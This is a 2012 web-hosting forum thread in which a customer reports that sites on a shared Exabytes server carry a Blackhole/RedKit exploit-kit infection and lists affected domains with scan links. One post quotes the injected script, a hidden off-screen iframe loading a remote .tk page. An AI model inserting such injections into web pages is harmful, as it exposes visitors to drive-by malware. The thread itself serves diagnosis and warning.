Welcome Guest ( Log In | Register )

Outline · [ Standard ] · Linear+

> Sites hosting with Exabytes got hacked?, Exabytes Customer Please Come In

views
     
TSxDragonZ
post Jul 19 2012, 11:16 AM, updated 9y ago

On my way
****
Senior Member
538 posts

Joined: Jul 2008
From: Just behide you !

This few days I saw my website requesting me to run Java or download a PDF file.

Let's cut short the story...
After some investigation I notice that the site is infected with "RedKit exploit kit / BlackHole Exploit Kit"

So what I did is get all the domain that hosted under "sphinx" / 110.4.40.109 server and did some scan and even others site that hosted under exabytes was infected. (see below for some list of infected site)


So is the hackers upload the exploit to my files or ?


It will inject something like this :

CODE
document.write('<style>.c0a8xe { position:absolute; left:-1401px; top:-1633px} </style> <div class="c0a8xe"><iframe src="http://fhrybregf.tk/25644443.html" width="469" height="221"></iframe></div>');


and it will appear randomly inside any .js files and even .php and even .html files (I can't even find it in the source code ) also I checked my .js file is CHMOD to 644 not 777. I assume it inject the malware code on the fly and then sent to user.

Did a scan on http://sitecheck.sucuri.net/scanner/ too, a warning will come out.

and this BlackHole Exploit is clever it will not show to some user, but you can use some of the site like http://www.webpagetest.org or http://jsunpack.jeek.org/joomla/ to check using different location and browser.


The Source Code Of The Target (malware) Site
http://pastebin.com/sCBNJih5 (Found on my site)
http://pastebin.com/nPU1WCDV (Unknow User Posted This)

Read:
http://www.avgthreatlabs.com/webthreats/in...le-exploit-kit/
http://www.symantec.com/connect/blogs/blackhole-theory
http://www.symantec.com/connect/blogs/blac...-random-domains
http://stopmalvertising.com/malware-report...ploit-kits.html
Google "Blackhole exploit kit"


NOTE: I DID NOT SAY Exabytes got hacked or what. I just cant figure out why some others site that hosted under the same IP got infected as well :

What they tell me is that :
QUOTE
From my checking the server is fine. As this is a shared hosting server, there might be other user being attacked if their account is not secure. However it attacked based on account, it will not affect other account. We do inform user on this and help to secure their site if found any account being attacked



Here's the list of website under the same IP : (Please look at the IP or .tk domain for the malware)
jefferson.com.my
http://jsunpack.jeek.org/?report=edffe0129...5a83da4680332b1
thundermatch.com.my
http://www.webpagetest.org/result/120719_RX_D4H/1/details/
chinwell.com.my
http://www.webpagetest.org/result/120719_T2_3JP/1/details/
mom2ashley.com
http://www.webpagetest.org/result/120718_0G_JAH/1/details/
freshm2m.com
http://www.webpagetest.org/result/120718_Q6_JDQ/1/details/
smkttdi.edu.my
http://www.webpagetest.org/result/120718_DE_K17/1/details/
islamic-world.net
http://jsunpack.jeek.org/joomla/?report=fb...23bdc939ebe080d
bent.com.my
http://www.webpagetest.org/result/120719_4K_D3G/1/details/
aiodot.com
http://www.webpagetest.org/result/120719_NM_D37/1/details/
celles.com
http://www.webpagetest.org/result/120719_5F_D6W/1/details/
malaysiasme.com.my
http://jsunpack.jeek.org/?report=475d5e036...f2e07c6e04462fc
http://www.webpagetest.org/result/120719_JJ_DZG/1/details/

http://www.webpagetest.org/result/120718_TJ_HRQ/1/details/
http://jsunpack.jeek.org/joomla/?report=78...78ae87ec5017dd9
http://wepawet.iseclab.org/view.php?hash=a...2701239&type=js

and there's more!



Exabytes is really slow in replying my tickets vmad.gif


This post has been edited by xDragonZ: Jul 19 2012, 08:49 PM
iWill
post Jul 19 2012, 11:23 AM

Enthusiast
*****
Senior Member
879 posts

Joined: Jan 2011
From: iWill.com.my
Hmmm... Thank you for sharing this. I hope it's not widespread. I have sites on their server.

Let us know what they say when you got the reply.

This post has been edited by iWill: Jul 19 2012, 11:23 AM
wanakev2
post Jul 19 2012, 01:43 PM

Getting Started
**
Junior Member
142 posts

Joined: May 2010
owh my. very shocking news..

i though only budget web hosting always get hacked. = (

thanks for sharing the info.
TSxDragonZ
post Jul 19 2012, 06:47 PM

On my way
****
Senior Member
538 posts

Joined: Jul 2008
From: Just behide you !

Update:

I asked my host to remove all my public_html files and I upload a simple index.php and the webpage is still infected. (and I checked the source code on the server is 100% untouched and its clean) but it is reported it contain another iframe. (I also try load the page on another computer, it contain hidden iframe that you need to use the tools like "Inspect Element" in Google Chrome to find that.)

http://www.webpagetest.org/result/120719_YY_CEZ/1/details/

This post has been edited by xDragonZ: Jul 19 2012, 08:50 PM
soundsyst64
post Jul 19 2012, 07:28 PM

I'm No-Longer-Noobs
*******
Senior Member
3,725 posts

Joined: Jul 2005
From: In /hardware/

hacking can be go through joomla/wordpress exploit or weak FTP/Cpanel password.

 

Change to:
| Lo-Fi Version
0.0349sec    0.35    5 queries    GZIP Disabled
Time is now: 22nd January 2021 - 12:34 AM